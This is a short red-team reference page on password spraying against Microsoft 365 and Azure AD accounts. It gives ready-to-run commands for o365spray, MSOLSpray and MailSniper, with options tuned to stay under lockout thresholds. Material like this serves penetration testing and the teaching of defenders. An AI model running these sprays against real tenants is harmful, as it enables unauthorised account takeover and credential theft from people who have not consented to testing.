# Password Spraying

## Theory

Once a list of existing usernames is established, a password spray attack can be executed to attempt retrieving passwords for these accounts. Password spraying involves using a single password (e.g., 'Password01') or a small set of common passwords across multiple accounts.

## Practice

{% tabs %}
{% tab title="o365spray" %}
[o365spray](https://github.com/0xZDH/o365spray) (python) can be used for for password spraying as follows. It supports various methods: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst

{% hint style="info" %}
The oAuth2 module can be used for federated spraying, but it should be noted that this will ONLY work when the target tenant has enabled password synchronization - otherwise authentication will always fail. The default mechanic is to default to the 'adfs' module when federation is identified.
{% endhint %}

```bash
# --spray: Password Spray Mode
# -U: Userfile
# -P: password file
# -p password
# --count: Number of password attempt per user before resetting lockout timer
# --lockout: Lockout policy's reset time (in minutes).
# -d: Target domain
# --spray-module: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst

python o365spray.py --spray -U usernames.txt -p passwords.tx --count 2 --lockout 5 --domain test.com
```

{% endtab %}

{% tab title="MSOLSpray" %}
[MSOLSpray](https://github.com/dafthack/MSOLSpray) (PowerShell) can be used for for password spraying as follows.

```powershell
Invoke-MSOLSpray -UserList valid-emails.txt -Password <PASSWORD> -Verbose
```

{% endtab %}

{% tab title="MailSniper" %}
[MailSniper](https://github.com/dafthack/MailSniper) (PowerShell) can be used for for password spraying as follows

```powershell
Invoke-PasswordSprayEWS -ExchHostname outlook.office365.com -UserList valid-emails.txt -Password <PASSWORD>
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://www.synacktiv.com/publications/azure-ad-introduction-for-red-teamers#attacking-azure-ad>" %}